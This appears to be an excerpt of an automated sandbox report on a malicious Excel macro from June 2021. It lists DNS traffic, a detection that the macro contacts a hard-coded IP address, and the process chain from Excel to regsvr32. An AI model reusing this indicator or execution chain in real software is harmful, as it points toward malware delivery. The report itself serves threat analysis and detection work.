All UDP traffic is DNS (port 53) to 8.8.8.8: 15 queries, each answered (source port 52991 is reused for a repeat query). The queried names are not present in this extract. None of them is needed for the connection above: the macro embeds 185.180.199.121 as a literal, which is what the "TCP traffic detected without corresponding DNS query" signature flags. |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Jun 23, 2021 17:15:06.121184111 CEST | 64646 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 23, 2021 17:15:06.185915947 CEST | 53 | 64646 | 8.8.8.8 | 192.168.2.4 |
Jun 23, 2021 17:15:06.718322992 CEST | 65298 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 23, 2021 17:15:06.795903921 CEST | 53 | 65298 | 8.8.8.8 | 192.168.2.4 |
Jun 23, 2021 17:15:06.873821020 CEST | 59123 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 23, 2021 17:15:06.931394100 CEST | 53 | 59123 | 8.8.8.8 | 192.168.2.4 |
Jun 23, 2021 17:15:07.123950005 CEST | 54531 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 23, 2021 17:15:07.170205116 CEST | 53 | 54531 | 8.8.8.8 | 192.168.2.4 |
Jun 23, 2021 17:15:08.130825043 CEST | 49714 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 23, 2021 17:15:08.194817066 CEST | 53 | 49714 | 8.8.8.8 | 192.168.2.4 |
Jun 23, 2021 17:15:09.283163071 CEST | 58028 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 23, 2021 17:15:09.329155922 CEST | 53 | 58028 | 8.8.8.8 | 192.168.2.4 |
Jun 23, 2021 17:15:09.618675947 CEST | 53097 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 23, 2021 17:15:09.678569078 CEST | 53 | 53097 | 8.8.8.8 | 192.168.2.4 |
Jun 23, 2021 17:15:10.556751966 CEST | 49257 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 23, 2021 17:15:10.607285023 CEST | 53 | 49257 | 8.8.8.8 | 192.168.2.4 |
Jun 23, 2021 17:15:11.958971024 CEST | 62389 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 23, 2021 17:15:12.013883114 CEST | 53 | 62389 | 8.8.8.8 | 192.168.2.4 |
Jun 23, 2021 17:15:13.115807056 CEST | 49910 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 23, 2021 17:15:13.170995951 CEST | 53 | 49910 | 8.8.8.8 | 192.168.2.4 |
Jun 23, 2021 17:15:18.221193075 CEST | 55854 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 23, 2021 17:15:18.267995119 CEST | 53 | 55854 | 8.8.8.8 | 192.168.2.4 |
Jun 23, 2021 17:15:19.737098932 CEST | 64549 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 23, 2021 17:15:19.827260971 CEST | 53 | 64549 | 8.8.8.8 | 192.168.2.4 |
Jun 23, 2021 17:15:19.890693903 CEST | 63153 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 23, 2021 17:15:19.951225996 CEST | 53 | 63153 | 8.8.8.8 | 192.168.2.4 |
Jun 23, 2021 17:15:20.205254078 CEST | 52991 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 23, 2021 17:15:20.287142992 CEST | 53 | 52991 | 8.8.8.8 | 192.168.2.4 |
Jun 23, 2021 17:15:21.247226000 CEST | 52991 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 23, 2021 17:15:21.308686018 CEST | 53 | 52991 | 8.8.8.8 | 192.168.2.4 |
Jun 23, 2021 17:15:21.408472061 CEST | 53700 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 23, 2021 17:15:21.463419914 CEST | 53 | 53700 | 8.8.8.8 | 192.168.2.4 |
Jun 23, 2021 17:15:22.286027908 CEST | 52991 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 23, 2021 17:15:22.347326994 CEST | 53 | 52991 | 8.8.8.8 | 192.168.2.4 |
Jun 23, 2021 17:15:23.603409052 CEST | 51726 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 23, 2021 17:15:23.649513960 CEST | 53 | 51726 | 8.8.8.8 | 192.168.2.4 |
Jun 23, 2021 17:15:24.286133051 CEST | 52991 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 23, 2021 17:15:24.367368937 CEST | 53 | 52991 | 8.8.8.8 | 192.168.2.4 |
Jun 23, 2021 17:15:24.449513912 CEST | 56794 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 23, 2021 17:15:24.512372017 CEST | 53 | 56794 | 8.8.8.8 | 192.168.2.4 |
Jun 23, 2021 17:15:25.646636009 CEST | 56534 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 23, 2021 17:15:25.695976973 CEST | 53 | 56534 | 8.8.8.8 | 192.168.2.4 |
Jun 23, 2021 17:15:26.830100060 CEST | 56627 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 23, 2021 17:15:26.876440048 CEST | 53 | 56627 | 8.8.8.8 | 192.168.2.4 |
Jun 23, 2021 17:15:28.333570004 CEST | 52991 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 23, 2021 17:15:28.381264925 CEST | 53 | 52991 | 8.8.8.8 | 192.168.2.4 |
Jun 23, 2021 17:15:28.387031078 CEST | 56621 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 23, 2021 17:15:28.442106009 CEST | 53 | 56621 | 8.8.8.8 | 192.168.2.4 |
Jun 23, 2021 17:15:29.908272028 CEST | 63116 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 23, 2021 17:15:29.954631090 CEST | 53 | 63116 | 8.8.8.8 | 192.168.2.4 |
Jun 23, 2021 17:15:31.781655073 CEST | 64078 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 23, 2021 17:15:31.833534002 CEST | 53 | 64078 | 8.8.8.8 | 192.168.2.4 |
Jun 23, 2021 17:15:32.596698999 CEST | 64801 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 23, 2021 17:15:32.652005911 CEST | 53 | 64801 | 8.8.8.8 | 192.168.2.4 |
Jun 23, 2021 17:15:33.857270956 CEST | 61721 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 23, 2021 17:15:33.916964054 CEST | 53 | 61721 | 8.8.8.8 | 192.168.2.4 |
Jun 23, 2021 17:15:34.882993937 CEST | 51255 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 23, 2021 17:15:34.929752111 CEST | 53 | 51255 | 8.8.8.8 | 192.168.2.4 |
Jun 23, 2021 17:15:35.695528984 CEST | 61522 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 23, 2021 17:15:35.747733116 CEST | 53 | 61522 | 8.8.8.8 | 192.168.2.4 |
Jun 23, 2021 17:15:40.779616117 CEST | 52337 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 23, 2021 17:15:40.837507963 CEST | 53 | 52337 | 8.8.8.8 | 192.168.2.4 |
Jun 23, 2021 17:16:00.890558004 CEST | 55046 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 23, 2021 17:16:01.126925945 CEST | 53 | 55046 | 8.8.8.8 | 192.168.2.4 |
Jun 23, 2021 17:16:01.807156086 CEST | 49612 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 23, 2021 17:16:01.928209066 CEST | 49285 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 23, 2021 17:16:01.956259966 CEST | 53 | 49612 | 8.8.8.8 | 192.168.2.4 |
Jun 23, 2021 17:16:02.004961967 CEST | 53 | 49285 | 8.8.8.8 | 192.168.2.4 |
Jun 23, 2021 17:16:02.082015991 CEST | 50601 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 23, 2021 17:16:02.156074047 CEST | 53 | 50601 | 8.8.8.8 | 192.168.2.4 |
Jun 23, 2021 17:16:02.620239973 CEST | 60875 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 23, 2021 17:16:02.688443899 CEST | 53 | 60875 | 8.8.8.8 | 192.168.2.4 |
Jun 23, 2021 17:16:03.309227943 CEST | 56448 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 23, 2021 17:16:03.369302988 CEST | 53 | 56448 | 8.8.8.8 | 192.168.2.4 |
Jun 23, 2021 17:16:03.978740931 CEST | 59172 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 23, 2021 17:16:04.052093029 CEST | 53 | 59172 | 8.8.8.8 | 192.168.2.4 |
Jun 23, 2021 17:16:04.663188934 CEST | 62420 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 23, 2021 17:16:04.724107981 CEST | 53 | 62420 | 8.8.8.8 | 192.168.2.4 |
Jun 23, 2021 17:16:05.235652924 CEST | 60579 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 23, 2021 17:16:05.295393944 CEST | 53 | 60579 | 8.8.8.8 | 192.168.2.4 |
Jun 23, 2021 17:16:06.113240957 CEST | 50183 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 23, 2021 17:16:06.159359932 CEST | 53 | 50183 | 8.8.8.8 | 192.168.2.4 |
Jun 23, 2021 17:16:07.438272953 CEST | 61531 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 23, 2021 17:16:07.506975889 CEST | 53 | 61531 | 8.8.8.8 | 192.168.2.4 |
Jun 23, 2021 17:16:08.171327114 CEST | 49228 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 23, 2021 17:16:08.231159925 CEST | 53 | 49228 | 8.8.8.8 | 192.168.2.4 |
Jun 23, 2021 17:16:15.274323940 CEST | 59794 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 23, 2021 17:16:15.337285995 CEST | 53 | 59794 | 8.8.8.8 | 192.168.2.4 |
Jun 23, 2021 17:16:15.428447962 CEST | 55916 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 23, 2021 17:16:15.486848116 CEST | 53 | 55916 | 8.8.8.8 | 192.168.2.4 |
Jun 23, 2021 17:16:19.999152899 CEST | 52752 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 23, 2021 17:16:20.061496019 CEST | 53 | 52752 | 8.8.8.8 | 192.168.2.4 |
Jun 23, 2021 17:16:49.556658983 CEST | 60542 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 23, 2021 17:16:49.620614052 CEST | 53 | 60542 | 8.8.8.8 | 192.168.2.4 |
Jun 23, 2021 17:16:53.546560049 CEST | 60689 | 53 | 192.168.2.4 | 8.8.8.8 |
Jun 23, 2021 17:16:53.628006935 CEST | 53 | 60689 | 8.8.8.8 | 192.168.2.4 |
Code Manipulations |
---|
Statistics |
---|
Behavior |
---|
System Behavior |
---|
General |
---|
Start time: | 17:16:17 |
Start date: | 23/06/2021 |
Path: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x9f0000 |
File size: | 27110184 bytes |
MD5 hash: | 5D6638F2C8F8571C593999C58866007E |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 17:16:43 |
Start date: | 23/06/2021 |
Path: | C:\Windows\SysWOW64\regsvr32.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x9d0000 |
File size: | 20992 bytes |
MD5 hash: | 426E7499F6A7346F0410DEAD0805586B |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Disassembly |
---|
Code Analysis |
---|